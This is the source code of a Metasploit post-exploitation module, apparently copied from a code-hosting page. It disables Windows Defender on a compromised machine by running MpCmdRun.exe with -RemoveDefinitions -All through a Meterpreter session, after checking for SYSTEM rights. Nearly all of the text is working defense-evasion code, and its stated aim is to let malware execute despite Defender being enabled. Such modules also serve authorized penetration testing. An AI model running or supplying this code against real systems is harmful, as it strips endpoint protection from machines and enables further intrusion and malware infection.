Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Windows::Priv
9
  include Msf::Post::Windows::Registry
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'Disable Windows Defender Signatures',
16
        'Description' => %q{
17
          This module with appropriate rights let to use the Windows Defender command-line utility a run and automation
18
          tool (mpcmdrun.exe) in order to disable all the signatures available installed for the compromised machine.
19
          The tool is prominently used for scheduling scans and updating the signature or definition files,
20
          but there is a switch created to restore the installed signature definitions to a previous backup copy or
21
          to the original default set of signatures which is none, disabling all the signatures and allowing malware
22
          to execute even with the Windows Defender solution enabled.
23
        },
24
        'License' => MSF_LICENSE,
25
        'Author' => [
26
          'metasploit@[at]csiete.org',
27
          'luisco100 <luisco100[at]gmail.com>'
28
        ], # Module author
29
        'Platform' => [ 'win' ],
30
        'SessionTypes' => [ 'meterpreter' ],
31
        'Actions' => [
32
          [ 'ROLLBACK', { 'Description' => 'Rollback Defender signatures' } ],
33
          [ 'UPDATE', { 'Description' => 'Update Defender signatures' } ]
34
        ],
35
        'DefaultAction' => 'ROLLBACK',
36
        'Compat' => {
37
          'Meterpreter' => {
38
            'Commands' => %w[
39
              stdapi_sys_config_getenv
40
            ]
41
          }
42
        },
43
        'Notes' => {
44
          # if you rollback the signatures, that resource is lost
45
          'Stability' => [SERVICE_RESOURCE_LOSS],
46
          'Reliability' => [],
47
          'SideEffects' => []
48
        }
49
      )
50
    )
51
  end
52

53
  def run
54
    # Are we system?
55
    if !is_system?
56
      fail_with(Failure::NoAccess, 'You must be System to run this Module')
57
    end
58

59
    # Is the binary there?
60
    if client.arch == ARCH_X86 && client.arch != sysinfo['Architecture']
61
      program_path = session.sys.config.getenv('ProgramW6432')
62
    else
63
      program_path = session.sys.config.getenv('ProgramFiles')
64
    end
65
    vprint_status("program_path = #{program_path}")
66
    file_path = program_path + '\Windows Defender\MpCmdRun.exe'
67
    vprint_status("file_path = #{file_path}")
68
    if !exist?(file_path)
69
      fail_with(Failure::NoAccess, "#{file_path} is not Present")
70
    end
71
    # Is defender even enabled?
72
    defender_disable_key = 'HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender'
73
    disable_key_value = meterpreter_registry_getvalinfo(defender_disable_key, 'DisableAntiSpyware', REGISTRY_VIEW_NATIVE)
74
    unless disable_key_value.nil? || disable_key_value != 1
75
      fail_with(Failure::NoTarget, 'Defender is not enabled')
76
    end
77

78
    case action.name
79
    when 'ROLLBACK'
80
      print_status('Removing all definitions for Windows Defender')
81
      cmd = "cmd.exe /c \"#{file_path}\" -RemoveDefinitions -All"
82
    when 'UPDATE'
83
      print_status('Updating definitions for Windows Defender')
84
      cmd = "cmd.exe /c \"#{file_path}\" -SignatureUpdate"
85
    else
86
      fail_with(Failure::BadConfig, 'Unknown action provided!')
87
    end
88
    print_status("Running #{cmd}")
89
    output = cmd_exec(cmd).to_s
90
    if output.include?('denied')
91
      print_bad(output)
92
    else
93
      print_status(output)
94
    end
95
  end
96
end
97

98